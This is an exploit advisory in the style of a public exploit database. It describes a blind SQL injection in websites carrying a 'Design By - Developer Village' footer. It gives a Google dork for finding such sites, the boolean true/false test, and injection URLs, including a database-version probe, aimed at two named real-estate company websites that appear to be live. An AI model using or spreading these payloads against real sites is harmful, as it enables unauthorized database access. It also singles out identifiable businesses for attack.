********************************************************* #Exploit Title: Developer Village - Blind Sql Injection #Date: 2024-01-05 #Exploit Author: Behrouz Mansoori #Google Dork: "Design By - Developer Village" #Category:webapps #Tested On: Mac, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * https://www.ransrealestateltd.com/project-details.php?projectsId=30%27%20and%20true--+ * https://www.ransrealestateltd.com/project-details.php?projectsId=30%27%20and%20false--+ * https://www.ransrealestateltd.com/project-details.php?projectsId=30%27%20and%20substring(@@version,1,1)=8--+ ### Demo 2: * https://www.okpropertiesltd.com/project-details.php?projectsId=17%27%20and%20true--+ * https://www.okpropertiesltd.com/project-details.php?projectsId=17%27%20and%20false--+ * https://www.okpropertiesltd.com/project-details.php?projectsId=17%27%20and%20substring(@@version,1,1)=8--+ ********************************************************* #Discovered by: Behrouz mansoori #Instagram: Behrouz_mansoori #Email: [email protected] *********************************************************